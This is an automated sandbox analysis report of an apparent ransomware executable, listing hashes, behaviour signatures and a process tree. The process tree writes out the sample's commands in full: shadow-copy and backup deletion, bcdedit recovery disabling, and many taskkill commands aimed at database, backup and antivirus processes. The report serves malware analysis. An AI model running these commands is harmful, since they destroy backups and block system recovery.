Analysis
max time kernel: 15s
max time network: 45s
platform: windows7_x64
resource: win7
submitted: 27-07-2020 06:50
Static task: static1

Behavioral task: behavioral1
Sample: D4D32E7583B3FD8363DED73C91ED3D08.bin.exe
Resource: win7 (windows7_x64)
0 signatures, 0 seconds

Behavioral task: behavioral2
Sample: D4D32E7583B3FD8363DED73C91ED3D08.bin.exe
Resource: win10v200722 (windows10_x64)
0 signatures, 0 seconds
General
Target: D4D32E7583B3FD8363DED73C91ED3D08.bin.exe
Size: 52KB
MD5: d4d32e7583b3fd8363ded73c91ed3d08
SHA1: 4079602dce0fb495ed0ec97c5aea5988127fb50c
SHA256: 2b37a372626063afce9e08199342a41bbe4183b0d5ba7864ff61eb6e6f7c4fdf
SHA512: e1ba8e27a19933f15e13ae310920bb74051b5dbe7d3408d8d5aad5f1b80ca7e2ac45d288115c357c9ffcf72a4d2ea29db513a591d64874d972b60962d746aadf
Score: 9/10
Malware Config
Signatures
- Suspicious use of WriteProcessMemory (588 IoCs)
D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 298 PID 1064 wrote to memory of 1536 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 298 PID 1536 wrote to memory of 836 1536 cmd.exe 300 PID 1536 wrote to memory of 836 1536 cmd.exe 300 PID 1536 wrote to memory of 836 1536 cmd.exe 300 PID 1064 wrote to memory of 204 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 301 PID 1064 wrote to memory of 204 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 301 PID 1064 wrote to memory of 204 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 301 PID 204 wrote to memory of 1360 204 cmd.exe 303 PID 204 wrote to memory of 1360 204 cmd.exe 303 PID 204 wrote to memory of 1360 204 cmd.exe 303 PID 1064 wrote to memory of 1496 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 304 PID 1064 wrote to memory of 1496 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 304 PID 1064 wrote to memory of 1496 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 304 PID 1496 wrote to memory of 1856 1496 cmd.exe 306 PID 1496 wrote to memory of 1856 1496 cmd.exe 306 PID 1496 wrote to memory of 1856 1496 cmd.exe 306 PID 1064 wrote to memory of 432 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 307 PID 1064 wrote to memory of 432 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 307 PID 1064 wrote to memory of 432 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 307 PID 432 wrote to memory of 1584 432 cmd.exe 309 PID 432 wrote to memory of 1584 432 cmd.exe 309 PID 432 wrote to memory of 1584 432 cmd.exe 309 PID 1064 wrote to memory of 1672 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 310 PID 1064 wrote to memory of 1672 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 310 PID 1064 wrote to memory of 1672 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 310 PID 1672 wrote to memory of 1876 1672 cmd.exe 312 PID 1672 wrote to memory of 1876 1672 cmd.exe 312 PID 1672 wrote to memory of 1876 1672 cmd.exe 312 PID 1064 wrote to memory of 1644 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 313 PID 1064 wrote to memory of 1644 1064 
D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 313 PID 1064 wrote to memory of 1644 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 313 PID 1644 wrote to memory of 1904 1644 cmd.exe 315 PID 1644 wrote to memory of 1904 1644 cmd.exe 315 PID 1644 wrote to memory of 1904 1644 cmd.exe 315 PID 1064 wrote to memory of 1636 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 316 PID 1064 wrote to memory of 1636 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 316 PID 1064 wrote to memory of 1636 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 316 PID 1636 wrote to memory of 1028 1636 cmd.exe 318 PID 1636 wrote to memory of 1028 1636 cmd.exe 318 PID 1636 wrote to memory of 1028 1636 cmd.exe 318 PID 1064 wrote to memory of 1040 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 319 PID 1064 wrote to memory of 1040 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 319 PID 1064 wrote to memory of 1040 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 319 PID 1040 wrote to memory of 580 1040 cmd.exe 321 PID 1040 wrote to memory of 580 1040 cmd.exe 321 PID 1040 wrote to memory of 580 1040 cmd.exe 321 -
Suspicious use of AdjustPrivilegeToken 131 IoCs
Deletes System State backups
pid Process
1260 wbadmin.exe
1648 wbadmin.exe
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process
1588 bcdedit.exe
1876 bcdedit.exe
-
Enumerates connected drives 3 TTPs
-
Drops file in Windows directory 6 IoCs
description ioc Process
File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl wbadmin.exe
File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl wbadmin.exe
File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl wbadmin.exe
File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl wbadmin.exe
File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl wbadmin.exe
File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl wbadmin.exe
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process
1964 vssadmin.exe
-
Kills process with taskkill 91 IoCs
NTFS ADS 5 IoCs
description ioc Process
File opened for modification C:\Users\Admin\AppData\Local\Temp\boot.sys:sgewszqwu D4D32E7583B3FD8363DED73C91ED3D08.bin.exe
File created C:\Users\Admin\AppData\Local\Temp\boot.sys:ddmdnjamzhispuay D4D32E7583B3FD8363DED73C91ED3D08.bin.exe
File created C:\Users\Admin\AppData\Local\Temp\boot.sys:sgewszqwu D4D32E7583B3FD8363DED73C91ED3D08.bin.exe
File created C:\Users\Admin\AppData\Local\Temp\boot.sys:datnfamalhsmqxgef D4D32E7583B3FD8363DED73C91ED3D08.bin.exe
File opened for modification C:\Users\Admin\AppData\Local\Temp\boot.sys:ouwvwpdmzxnjq D4D32E7583B3FD8363DED73C91ED3D08.bin.exe
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies service 2 TTPs 5 IoCs
description ioc Process
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\D4D32E7583B3FD8363DED73C91ED3D08.bin.exe: "C:\Users\Admin\AppData\Local\Temp\D4D32E7583B3FD8363DED73C91ED3D08.bin.exe"
- Suspicious use of WriteProcessMemory
- NTFS ADS
PID:1064
  C:\Windows\system32\cmd.exe: cmd /C wmic.exe SHADOWCOPY DELETE /nointeractive
  - Suspicious use of WriteProcessMemory
  PID:1320
    C:\Windows\System32\Wbem\WMIC.exe: wmic.exe SHADOWCOPY DELETE /nointeractive
    - Suspicious use of AdjustPrivilegeToken
    PID:1440
  C:\Windows\system32\cmd.exe: cmd /C wbadmin DELETE SYSTEMSTATEBACKUP
  - Suspicious use of WriteProcessMemory
  PID:1832
    C:\Windows\system32\wbadmin.exe: wbadmin DELETE SYSTEMSTATEBACKUP
    - Deletes System State backups
    - Drops file in Windows directory
    PID:1260
  C:\Windows\system32\cmd.exe: cmd /C wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
  - Suspicious use of WriteProcessMemory
  PID:1852
    C:\Windows\system32\wbadmin.exe: wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
    - Deletes System State backups
    - Drops file in Windows directory
    PID:1648
  C:\Windows\system32\cmd.exe: cmd /C bcdedit.exe /set {default} recoveryenabled No
  - Suspicious use of WriteProcessMemory
  PID:1596
    C:\Windows\system32\bcdedit.exe: bcdedit.exe /set {default} recoveryenabled No
    - Modifies boot configuration data using bcdedit
    PID:1588
  C:\Windows\system32\cmd.exe: cmd /C bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  - Suspicious use of WriteProcessMemory
  PID:1560
    C:\Windows\system32\bcdedit.exe: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
    - Modifies boot configuration data using bcdedit
    PID:1876
  C:\Windows\system32\cmd.exe: cmd /C vssadmin.exe Delete Shadows /All /Quiet
  - Suspicious use of WriteProcessMemory
  PID:1900
    C:\Windows\system32\vssadmin.exe: vssadmin.exe Delete Shadows /All /Quiet
    - Interacts with shadow copies
    PID:1964
  C:\Windows\system32\cmd.exe: cmd /C C:\Windows\system32\vssvc.exe
  - Suspicious use of WriteProcessMemory
  PID:1944
    C:\Windows\system32\VSSVC.exe: C:\Windows\system32\vssvc.exe
    PID:2000
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM wxServer*
  - Suspicious use of WriteProcessMemory
  PID:2036
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM wxServer*
    - Suspicious use of AdjustPrivilegeToken
    - Kills process with taskkill
    PID:984
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM QBFCService*
  - Suspicious use of WriteProcessMemory
  PID:836
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM QBFCService*
    - Suspicious use of AdjustPrivilegeToken
    - Kills process with taskkill
    PID:1572
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM QBVSS*
  - Suspicious use of WriteProcessMemory
  PID:1544
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM QBVSS*
    - Suspicious use of AdjustPrivilegeToken
    - Kills process with taskkill
    PID:1712
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM sql*
  - Suspicious use of WriteProcessMemory
  PID:220
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM sql*
    - Suspicious use of AdjustPrivilegeToken
    - Kills process with taskkill
    PID:1828
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM msaccess*
  PID:1320
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM msaccess*
    - Suspicious use of AdjustPrivilegeToken
    - Kills process with taskkill
    PID:1836
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM mssql*
  PID:1392
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM mssql*
    - Suspicious use of AdjustPrivilegeToken
    - Kills process with taskkill
    PID:1600
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM mysql*
  PID:1672
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM mysql*
    - Suspicious use of AdjustPrivilegeToken
    - Kills process with taskkill
    PID:1644
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM wxServerView*
  PID:1560
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM wxServerView*
    - Suspicious use of AdjustPrivilegeToken
    - Kills process with taskkill
    PID:1928
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM sqlmangr*
  PID:1860
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM sqlmangr*
    - Suspicious use of AdjustPrivilegeToken
    PID:1040
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM RAgui*
  PID:1984
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM RAgui*
    - Suspicious use of AdjustPrivilegeToken
    PID:2028
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM supervise*
  PID:1504
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM supervise*
    - Suspicious use of AdjustPrivilegeToken
    PID:1116
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM Culture*
  PID:1512
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM Culture*
    - Suspicious use of AdjustPrivilegeToken
    - Kills process with taskkill
    PID:204
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM Defwatch*
  PID:236
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM Defwatch*
    - Suspicious use of AdjustPrivilegeToken
    - Kills process with taskkill
    PID:1476
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM winword*
  PID:1356
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM winword*
    - Suspicious use of AdjustPrivilegeToken
    - Kills process with taskkill
    PID:1256
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM QBW32*
  PID:1604
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM QBW32*
    - Suspicious use of AdjustPrivilegeToken
    PID:1660
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM QBDBMgr*
  PID:1652
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM QBDBMgr*
    - Suspicious use of AdjustPrivilegeToken
    PID:1884
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM qbupdate*
  PID:1868
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM qbupdate*
    - Suspicious use of AdjustPrivilegeToken
    - Kills process with taskkill
    PID:1948
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM axlbridge*
  PID:1972
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM axlbridge*
    - Suspicious use of AdjustPrivilegeToken
    - Kills process with taskkill
    PID:1944
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM httpd*
  PID:2012
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM httpd*
    - Suspicious use of AdjustPrivilegeToken
    - Kills process with taskkill
    PID:1988
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM fdlauncher*
  PID:1436
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM fdlauncher*
    - Suspicious use of AdjustPrivilegeToken
    - Kills process with taskkill
    PID:836
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM MsDtSrvr*
  PID:208
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM MsDtSrvr*
    - Suspicious use of AdjustPrivilegeToken
    PID:1696
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM java*
  PID:520
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM java*
    PID:224
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM 360se*
  PID:1832
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM 360se*
    - Kills process with taskkill
    PID:1320
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM 360doctor*
  PID:1656
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM 360doctor*
    PID:1608
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM wdswfsafe*
  PID:1876
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM wdswfsafe*
    - Kills process with taskkill
    PID:1912
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM fdhost*
  PID:1636
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM fdhost*
    - Kills process with taskkill
    PID:536
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM GDscan*
  PID:1948
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM GDscan*
    - Kills process with taskkill
    PID:284
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM ZhuDongFangYu*
  PID:1944
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM ZhuDongFangYu*
    - Kills process with taskkill
    PID:2032
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM QBDBMgrN*
  PID:1988
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM QBDBMgrN*
    - Kills process with taskkill
    PID:1508
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM mysqld*
  PID:836
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM mysqld*
    - Kills process with taskkill
    PID:1536
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM AutodeskDesktopApp*
  PID:1720
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM AutodeskDesktopApp*
    - Kills process with taskkill
    PID:1828
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM acwebbrowser*
  PID:220
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM acwebbrowser*
    - Kills process with taskkill
    PID:1836
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM Creative Cloud*
  PID:1808
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM Creative Cloud*
    PID:1600
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM Adobe Desktop Service*
  PID:528
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM Adobe Desktop Service*
    - Kills process with taskkill
    PID:1764
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM CoreSync*
  PID:1564
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM CoreSync*
    PID:1664
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM Adobe CEF Helper*
  PID:468
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM Adobe CEF Helper*
    PID:1940
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM node*
  PID:1880
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM node*
    - Kills process with taskkill
    PID:1868
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM AdobeIPCBroker*
  PID:1932
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM AdobeIPCBroker*
    PID:1952
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM sync-taskbar*
  PID:2020
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM sync-taskbar*
    - Kills process with taskkill
    PID:1944
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM sync-worker*
  PID:1424
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM sync-worker*
    - Kills process with taskkill
    PID:1508
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM InputPersonalization*
  PID:1312
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM InputPersonalization*
    PID:1536
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM AdobeCollabSync*
  PID:1524
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM AdobeCollabSync*
    - Kills process with taskkill
    PID:236
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM BrCtrlCntr*
  PID:208
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM BrCtrlCntr*
    PID:1256
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM BrCcUxSys*
  PID:220
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM BrCcUxSys*
    - Kills process with taskkill
    PID:432
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM SimplyConnectionManager*
  PID:1648
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM SimplyConnectionManager*
    - Kills process with taskkill
    PID:1660
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM Simply.SystemTrayIcon*
  PID:656
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM Simply.SystemTrayIcon*
    - Kills process with taskkill
    PID:1564
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM fbguard*
  PID:1940
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM fbguard*
    PID:1636
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM fbserver*
  PID:1868
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM fbserver*
    - Kills process with taskkill
    PID:1956
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM ONENOTEM*
  PID:1952
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM ONENOTEM*
    - Kills process with taskkill
    PID:2032
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM wrapper*
  PID:1944
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM wrapper*
    - Kills process with taskkill
    PID:212
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM DefWatch*
  PID:1508
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM DefWatch*
    - Kills process with taskkill
    PID:1396
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM ccEvtMgr*
  PID:1536
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM ccEvtMgr*
    - Kills process with taskkill
    PID:1476
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM ccSetMgr*
  PID:236
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM ccSetMgr*
    - Kills process with taskkill
    PID:824
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM SavRoam*
  PID:1256
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM SavRoam*
    - Kills process with taskkill
    PID:316
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM Sqlservr*
  PID:1392
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM Sqlservr*
    PID:1656
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM sqlagent*
  PID:1692
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM sqlagent*
    PID:1588
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM sqladhlp*
  PID:1920
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM sqladhlp*
    - Kills process with taskkill
    PID:468
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM Culserver*
  PID:840
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM Culserver*
    PID:1880
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM RTVscan*
  PID:1916
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM RTVscan*
    - Kills process with taskkill
    PID:1932
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM sqlbrowser*
  PID:1924
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM sqlbrowser*
    - Kills process with taskkill
    PID:2020
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM SQLADHLP*
  PID:1988
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM SQLADHLP*
    - Kills process with taskkill
    PID:1424
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM QBIDPService*
  PID:836
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM QBIDPService*
    - Kills process with taskkill
    PID:1512
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM Intuit.QuickBooks.FCS*
  PID:1528
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM Intuit.QuickBooks.FCS*
    - Kills process with taskkill
    PID:1524
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM QBCFMonitorService*
  PID:1856
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM QBCFMonitorService*
    - Kills process with taskkill
    PID:1616
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM sqlwriter*
  PID:1808
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM sqlwriter*
    PID:520
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM msmdsrv*
  PID:1912
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM msmdsrv*
    - Kills process with taskkill
    PID:1352
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM tomcat6*
  PID:1904
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM tomcat6*
    - Kills process with taskkill
    PID:1608
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM zhudongfangyu*
  PID:1028
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM zhudongfangyu*
    - Kills process with taskkill
    PID:1884
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM vmware-usbarbitator64*
  PID:576
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM vmware-usbarbitator64*
    - Kills process with taskkill
    PID:1560
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM vmware-converter*
  PID:2040
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM vmware-converter*
    - Kills process with taskkill
    PID:1964
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM dbsrv12*
  PID:984
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM dbsrv12*
    - Kills process with taskkill
    PID:2032
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM dbeng8*
  PID:228
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM dbeng8*
    - Kills process with taskkill
    PID:2000
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM MSSQL$MICROSOFT##WID*
  PID:1828
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM MSSQL$MICROSOFT##WID*
    PID:1116
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM MSSQL$VEEAMSQL2012*
  PID:1360
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM MSSQL$VEEAMSQL2012*
    - Kills process with taskkill
    PID:1312
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM SQLAgent$VEEAMSQL2012*
  PID:1260
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM SQLAgent$VEEAMSQL2012*
    PID:236
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM SQLBrowser*
  PID:1584
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM SQLBrowser*
    - Kills process with taskkill
    PID:1256
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM SQLWriter*
  PID:268
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM SQLWriter*
    - Kills process with taskkill
    PID:1912
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM FishbowlMySQL*
  PID:1592
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM FishbowlMySQL*
    PID:1692
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM MSSQL$MICROSOFT##WID*
  PID:2024
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM MSSQL$MICROSOFT##WID*
    PID:1920
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM MySQL57*
  PID:284
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM MySQL57*
    PID:576
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*
  PID:308
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*
    - Kills process with taskkill
    PID:2040
  C:\Windows\system32\cmd.exe: cmd /C taskkill /F /T /IM MSSQLServerADHelper100*
  PID:1500
    C:\Windows\system32\taskkill.exe: taskkill /F /T /IM MSSQLServerADHelper100*
- Kills process with taskkill
PID:1952
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*2⤵PID:1720
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*3⤵
- Kills process with taskkill
PID:1308
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM msftesql-Exchange*2⤵PID:1536
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM msftesql-Exchange*3⤵
- Kills process with taskkill
PID:836
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM MSSQL$MICROSOFT##SSEE*2⤵PID:204
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM MSSQL$MICROSOFT##SSEE*3⤵PID:1360
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM MSSQL$SBSMONITORING*2⤵PID:1496
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM MSSQL$SBSMONITORING*3⤵PID:1856
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM MSSQL$SHAREPOINT*2⤵PID:432
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM MSSQL$SHAREPOINT*3⤵
- Kills process with taskkill
PID:1584
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING*2⤵PID:1672
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING*3⤵
- Kills process with taskkill
PID:1876
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT*2⤵PID:1644
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT*3⤵PID:1904
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM SQLAgent$SBSMONITORING*2⤵PID:1636
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM SQLAgent$SBSMONITORING*3⤵
- Kills process with taskkill
PID:1028
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM SQLAgent$SHAREPOINT*2⤵PID:1040
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM SQLAgent$SHAREPOINT*3⤵
